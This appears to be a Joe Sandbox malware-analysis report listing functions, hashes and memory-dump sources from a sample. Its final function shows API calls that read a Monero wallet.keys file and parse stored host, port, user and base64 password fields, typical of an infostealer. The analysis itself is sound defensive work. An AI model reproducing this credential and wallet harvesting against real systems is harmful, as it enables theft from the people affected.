                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: O`?j
                    • API String ID: 0-1599995437
                    • Opcode ID: e824d0437195db68111d610cea09f3c9e40bd59a23d3807603af7a3e6bfeeddc
                    • Instruction ID: 8c71139befb94eb2675cd3b922a86099862b06eb66163448c6bddcde31ec521f
                    • Opcode Fuzzy Hash: e824d0437195db68111d610cea09f3c9e40bd59a23d3807603af7a3e6bfeeddc
                    • Instruction Fuzzy Hash: E4513DF3A082049FE3046E7CEC4476BBBD9EF94720F19463DEAC4D3784DA3858058656
                    Function 00F76A03 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: D?y
                    • API String ID: 0-1981770236
                    • Opcode ID: 1508ae38041f9738df6dab4db0b38f0fce499153f629428fd1f11dcfbd9c9ca0
                    • Instruction ID: 05c52376d56bc8cf39bdc9a1be578bd8508811edd3c5f229b73011d3137da25d
                    • Opcode Fuzzy Hash: 1508ae38041f9738df6dab4db0b38f0fce499153f629428fd1f11dcfbd9c9ca0
                    • Instruction Fuzzy Hash: A46138B3A183105BE350AE2DDC8477AB7D9EF94720F1A423DDF8993780E93A6D044796
                    Function 00E5B484 Relevance: 1.4, Strings: 1, Instructions: 178COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $}
                    • API String ID: 0-997030075
                    • Opcode ID: 140a0dcc92c3118789f56914a4932f9a2d50680679096038f3e7ff4d57e29d9d
                    • Instruction ID: 9d56cbb81e07403b9088763e4af515ef8503dce1e039a34ea20c3a37dc8bb358
                    • Opcode Fuzzy Hash: 140a0dcc92c3118789f56914a4932f9a2d50680679096038f3e7ff4d57e29d9d
                    • Instruction Fuzzy Hash: 3E5104F3A597045BF3086968ED953B676C6DBD4321F2B823DE79983B88EC7E48014285
                    Function 01095148 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: foE
                    • API String ID: 0-1674453201
                    • Opcode ID: ec8cd656d07a97354e9cb3455b2108a9b8500765e12d01b6dd36e0ce6bba99b4
                    • Instruction ID: 14d0a5d532dfe05103c79cf0f6b1039b075b3d92790e77ac616ac356d9f0b0f6
                    • Opcode Fuzzy Hash: ec8cd656d07a97354e9cb3455b2108a9b8500765e12d01b6dd36e0ce6bba99b4
                    • Instruction Fuzzy Hash: 475187F740C300DFDB066E2AECA277EBBE5DB54220F15492FEAC246744F5B559019283
                    Function 00ED3F6A Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 6Q^_
                    • API String ID: 0-1184235609
                    • Opcode ID: 87ff9da0c8d2f4c85a16e38709d56509b4a1ac9dfe93dba0262360759a7d98be
                    • Instruction ID: 8691012eea41d9a46fcc9ed862d602b20dddaf2b97ea04194a03d8966caa9746
                    • Opcode Fuzzy Hash: 87ff9da0c8d2f4c85a16e38709d56509b4a1ac9dfe93dba0262360759a7d98be
                    • Instruction Fuzzy Hash: 294127F3A182045FF304A97CED9976BB79AD7D4324F1A863DEB85C7384E97988014241
                    Function 00F18662 Relevance: .2, Instructions: 228COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 13292fbdd8fb7b6ff93849d15a949d55534a058f0f9aa3aa87a89fc90f8aa1cf
                    • Instruction ID: 3a7b174eece0292f20de5f45ecd42f2f1b4107c8d9d9d4d9d70974758e39fe67
                    • Opcode Fuzzy Hash: 13292fbdd8fb7b6ff93849d15a949d55534a058f0f9aa3aa87a89fc90f8aa1cf
                    • Instruction Fuzzy Hash: 466148F390C214ABE3046E3DDD8567ABBE8EB54720F1A463DEEC893744F9359D048292
                    Function 00ED26DF Relevance: .2, Instructions: 179COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8adf6f78e77fd38eaccbde5888988921d893ab1bcb3096afd0a709e9787b7c44
                    • Instruction ID: ce012f108cf68d41d607498fc30bb45e71f25fe062a965601dcb76100617cab1
                    • Opcode Fuzzy Hash: 8adf6f78e77fd38eaccbde5888988921d893ab1bcb3096afd0a709e9787b7c44
                    • Instruction Fuzzy Hash: 705104B3D082109BE319EE29DC52A7BF7E5EF94720F16893DDAC593340EA3558018687
                    Function 01032829 Relevance: .2, Instructions: 172COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 511f33187112f9c630d2aed2ac45fc3a14933a55a742972a4518ff062a7822df
                    • Instruction ID: 61db2a3b0d7bc0a71e144d2c118cf0f6b2abcfa75843a7cb05206cb9d2b27fec
                    • Opcode Fuzzy Hash: 511f33187112f9c630d2aed2ac45fc3a14933a55a742972a4518ff062a7822df
                    • Instruction Fuzzy Hash: 085144B390D614CFD204AF29DD4463EB6E9EBD4790F16892EDAC68B704EA3158418783
                    Function 00E6710A Relevance: .2, Instructions: 170COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c53f7c9ab42f01bae4a63d16f295f9bd631ef80df7a99a3729f4305db3213076
                    • Instruction ID: 751c835d24f8a08cef148e2c9a39761c3e85362ece8cd5a57d7fbfca5a656cb1
                    • Opcode Fuzzy Hash: c53f7c9ab42f01bae4a63d16f295f9bd631ef80df7a99a3729f4305db3213076
                    • Instruction Fuzzy Hash: 94415EF3B081005BE7085E29ED92BBBB7D6EBD4361F26813ED6C5C3384ED7558058692
                    Function 010043CE Relevance: .1, Instructions: 89COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a67a8644121dce69ead6947dfafb0d465ba2dc7658eed5dd21a1757bde228c9e
                    • Instruction ID: 4519bf4d1bef6e9aeff94aa8281b62d5c57d1ed104b9a344972ae7ae9eda1a70
                    • Opcode Fuzzy Hash: a67a8644121dce69ead6947dfafb0d465ba2dc7658eed5dd21a1757bde228c9e
                    • Instruction Fuzzy Hash: 4121D5B350C7149FE701AE1ADC856BAFBE5EF88220F068A2DEAD443B04D635684186C7
                    Function 00BD9750 Relevance: .0, Instructions: 15COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                    Function 00BD0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BD8E0B
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BC99EC
                      • Part of subcall function 00BC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BC9A11
                      • Part of subcall function 00BC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BC9A31
                      • Part of subcall function 00BC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BC148F,00000000), ref: 00BC9A5A
                      • Part of subcall function 00BC99C0: LocalFree.KERNEL32(00BC148F), ref: 00BC9A90
                      • Part of subcall function 00BC99C0: CloseHandle.KERNEL32(000000FF), ref: 00BC9A9A
                      • Part of subcall function 00BD8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BD8E52
                    • GetProcessHeap.KERNEL32(00000000,000F423F,00BE0DBA,00BE0DB7,00BE0DB6,00BE0DB3), ref: 00BD0362
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD0369
                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00BD0385
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BE0DB2), ref: 00BD0393
                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 00BD03CF
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BE0DB2), ref: 00BD03DD
                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00BD0419
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BE0DB2), ref: 00BD0427
                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00BD0463
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BE0DB2), ref: 00BD0475
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BE0DB2), ref: 00BD0502
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BE0DB2), ref: 00BD051A
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BE0DB2), ref: 00BD0532
